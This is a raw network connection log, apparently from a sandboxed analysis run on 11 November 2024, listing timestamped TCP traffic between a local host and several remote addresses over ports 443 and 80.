Nov 11, 2024 10:33:26.428459883 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.428745031 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.428786039 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.428792953 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.429125071 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.429152012 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.429291010 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.429403067 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.429415941 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.432636976 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.432903051 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.432914019 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.433281898 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.434537888 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.434604883 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.434741020 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.434741020 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.434760094 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.443583012 CET	443	49858	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.443998098 CET	49858	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.444010019 CET	443	49858	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.444029093 CET	443	49857	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.444189072 CET	443	49860	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.444657087 CET	49860	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.444679022 CET	443	49860	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.444714069 CET	49857	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.444727898 CET	443	49857	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.444734097 CET	443	49859	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.445285082 CET	443	49862	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.445322037 CET	49859	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.445328951 CET	443	49859	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.445547104 CET	49862	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.445579052 CET	443	49862	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.445749998 CET	443	49860	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.445890903 CET	49860	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.446106911 CET	443	49857	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.446218967 CET	49857	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.446307898 CET	443	49859	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.446499109 CET	49859	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.446845055 CET	443	49861	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.447103977 CET	49857	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.447105885 CET	49860	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.447170019 CET	443	49860	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.447201967 CET	49859	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.447261095 CET	443	49859	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.447340012 CET	443	49857	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.447391033 CET	49861	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.447398901 CET	443	49861	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448204041 CET	443	49863	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448229074 CET	443	49862	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448332071 CET	49862	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.448535919 CET	49863	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.448544979 CET	443	49863	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448561907 CET	443	49861	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448880911 CET	443	49863	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.448910952 CET	49862	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.449168921 CET	49863	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.449234962 CET	443	49863	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.449628115 CET	443	49858	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.449660063 CET	49861	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.449739933 CET	443	49861	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.449800014 CET	49858	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.449820042 CET	443	49862	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.450107098 CET	49858	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.450160980 CET	443	49858	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.453588009 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.457698107 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.457715034 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.457843065 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.457851887 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.457961082 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.458471060 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.459136963 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.459151983 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.459242105 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.459243059 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.459252119 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.459330082 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.460144043 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.460160017 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.460432053 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.460439920 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.462711096 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.497265100 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.497442007 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.499994040 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.499994040 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.500092030 CET	49851	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.500099897 CET	443	49851	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.501981974 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.503045082 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.503089905 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.503226995 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.503377914 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.503387928 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.520478010 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521255016 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521327019 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521365881 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521445990 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521445990 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521465063 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521502018 CET	49854	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521507025 CET	443	49854	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521836042 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521836042 CET	49852	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.521842003 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.521850109 CET	443	49852	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.523974895 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.523993015 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.524342060 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.524362087 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.524391890 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.524427891 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.524643898 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.524657011 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.524743080 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.524751902 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.538616896 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.538641930 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.538791895 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.538800955 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.538878918 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.539239883 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.539258003 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.539381981 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.539391041 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.539486885 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.540107965 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.540123940 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.540232897 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.540232897 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.540241957 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.540672064 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.541047096 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.541064024 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.541160107 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.541167021 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.541316032 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.544145107 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.544164896 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.544275999 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.544284105 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.544518948 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.545097113 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545115948 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545295000 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.545301914 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545454025 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545475960 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545485020 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.545495033 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.545511007 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.545561075 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.563951015 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.563952923 CET	49858	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.563961983 CET	49861	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.563961983 CET	49863	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.563963890 CET	443	49858	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.579346895 CET	49857	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.579355001 CET	443	49857	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.579370022 CET	49859	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.579370975 CET	49860	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.579371929 CET	49862	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.579375029 CET	443	49859	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.579394102 CET	443	49860	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.579407930 CET	443	49862	23.209.72.25	192.168.2.5
Nov 11, 2024 10:33:26.581116915 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.581912041 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.581939936 CET	443	49849	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.582030058 CET	49849	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.619513035 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.619560957 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.619641066 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.619641066 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.619654894 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.619952917 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.619975090 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.619982958 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.619992971 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.620012999 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.620187998 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.620398045 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.620419979 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.620481014 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.620481014 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.620488882 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.620745897 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.621956110 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.621994019 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622046947 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622055054 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622076988 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622077942 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622100115 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622107983 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622116089 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622142076 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622200012 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622291088 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622306108 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622378111 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622378111 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622385979 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622400999 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622428894 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622441053 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622456074 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622471094 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622494936 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.622525930 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.622586012 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.627052069 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.628353119 CET	49841	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.628359079 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.643913031 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.643944025 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.643970966 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.644043922 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.644043922 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.644058943 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.644432068 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.652880907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.652894020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.652950048 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.652970076 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.652992964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653012991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653017044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653029919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653042078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653068066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653116941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653129101 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653140068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653147936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653155088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653167963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653170109 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653179884 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653181076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653193951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653206110 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653326988 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653328896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653340101 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653394938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653476000 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653489113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653503895 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653520107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653531075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653542042 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653544903 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653564930 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653614998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653626919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653637886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653640985 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653656006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653661013 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653673887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653682947 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653717041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653727055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653727055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653731108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653743029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653755903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653789043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653809071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653809071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653840065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653851986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653862953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653863907 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653886080 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653891087 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.653897047 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653908014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653911114 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.653918982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653923988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653925896 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653934956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653947115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653956890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653959036 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.653965950 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.653968096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.653978109 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.653980970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654002905 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654002905 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.654017925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654026031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654038906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654064894 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654078007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654082060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654082060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654088020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654099941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654114008 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654124975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654130936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654160023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654174089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654174089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654179096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654190063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654201984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654212952 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654223919 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654227018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654254913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654254913 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654257059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654269934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654279947 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654293060 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654294014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654310942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654321909 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654325962 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654333115 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654335022 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654345989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654369116 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654371023 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654382944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654402971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654407024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654421091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654437065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654439926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654453039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654464006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654474020 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654480934 CET	49747	80	192.168.2.5	185.215.113.206
